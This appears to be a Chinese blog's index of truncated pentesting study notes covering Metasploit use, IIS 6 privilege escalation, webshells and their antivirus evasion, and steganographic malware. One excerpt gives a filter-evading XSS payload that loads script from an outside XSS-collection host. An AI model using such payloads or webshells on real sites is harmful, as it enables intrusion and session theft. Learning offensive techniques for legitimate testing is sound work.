参考：https://blog.csdn.net/helloexp/article/details/90514367?utm_medium=distribute.pc_relevant_t0.none-task-blog-BlogCommendFromMachineLearnPai2-1.baidujs&dist_request_id=&depth_1-utm_source=...

钱包中需要有钱 ( sender ) (否则会报错) contract的abi 需要正确 （abi不正确的话，就算你的调用js 代码是正确的，也会报莫名其妙的错误） web3.js 一些package的版本需要正确（ 最新版本1.7.x ，我的一些项目居然安装 0.19.x ） 网络的要求特别严格，( 我在te...

如题。 $ db_nmap   扫描 $ hosts 查看结果 hosts -u  显示UP的主机 。  -c address 只显示某个列。 设置数据库 sudo su postgres $ psql  postgres=# GRANT ALL PRIVILEGES ON ALL TABLES IN SCHEMA public TO myr...

本次的靶机是 IIS 6,  ASP 所以使用了metasploit 进行提权 1. 启动metasploit 2. search iis  20 auxiliary/dos/windows/http/ms10_065_ii6_asp_dos 2010-09-14 normal No Microsoft...

refer to: https://doveip.com/ 1. 注册， 登录 2. 充值，可以选择 TRX 的usdt 3. 使用 3.1 获得 token curl -d "user=abcd&password=abcd" https://dvapi.doveproxy.net/cmapi.php?rq=login {"errno":200,"msg":"Success","...

参考：https://www.darkoperator.com/installing-metasploit-in-ubunt 也可以参考：  https://www.linuxidc.com/Linux/2019-01/156378.htm 安装： ubuntu下： $ apt update 1. 安装jdk:   apt install openjdk-...

metasploit 是用ruby写的。 所以本质上就是如何把自定义的module放进去。 kali下的默认位置； /usr/share/metasploit-framework/ 进来，可以发现有module文件夹，里面都是 各个cve 等漏洞的 exploit  可以放在 ~/.msf4/modules目录下， 也可以放在默认安装路径下。  我们以 cve-...

参考：https://tryhackme.com 一定要来练习

metasploit 超级超级厉害。 可以认为它就是黑客的武器库。  官网：https://github.com/rapid7/metasploit-framework/wiki 完整的文档 在这里：https://www.offensive-security.com/metasploit-unleashed/metasploit-fundamentals/ 启动 kali -...

1. XSS有专门的平台可以注册并使用。 例如  xs.sb  域名极短。 适合注入 2. 使用这个来测试： </tExtArEa><sCRipt sRC=//xsshs.cn/FxAp></scRIpt> 3. 使用onerror事件，来规避script关键字：（例如某些WAF或者editor会拦截） <img src=x on...

参考：

参考：http://passport.shiyanbar.com/register

refer to:https://securitytrails.com/corp/api

参考:  https://www.hacker101.com/start-here 一定要学习。

refer to: https://accounts.censys.io/login 过程太简单了。略。

参考： https://book.hacktricks.xyz/pentesting-web/file-upload  一个大致的策略，很详尽 https://medium.com/@GaelleTjat/a-webshell-story-59ffd84ef012  一次成功的渗透（通过文件名字.. 来越权访问）

一句话木马的作用： 上传到某网站后台(php, asp, jsp ... ) ，然后再攻击者段运行webshell(菜刀)类程序，就可以连接，实现： 1 文件夹的浏览 2 上传文件 3 webshell webshell分成： 中国菜刀（已经挂掉了，找不到地方下载. exe 文件， 只运行在 windows） Cknife  java程序，可以跨平台（理论上），实际上无法在 kal...

refer to: https://stackoverflow.com/questions/2961673/find-missing-argument-to-exec find: missing argument to `-exec' 解决办法： 结尾加上 \; 例如： find /tmp/root_lala -exec whoami \;

refer to: https://xz.aliyun.com/t/5152 有好几个是全绿的: https://uuzdaisuki.com/2021/05/11/webshell%E5%85%8D%E6%9D%80%E7%A0%94%E7%A9%B6php%E7%AF%87/ 用py脚本批量生成： https://pureqh.top/?p=4638

参考：https://blog.sucuri.net/2020/11/css-js-steganography-in-fake-flash-player-update-malware.html 介绍了如何在css/js/flash当中使用。 参考：https://stegosploit.info/ 介绍了隐写术在图片中的使用。youtube上也有视频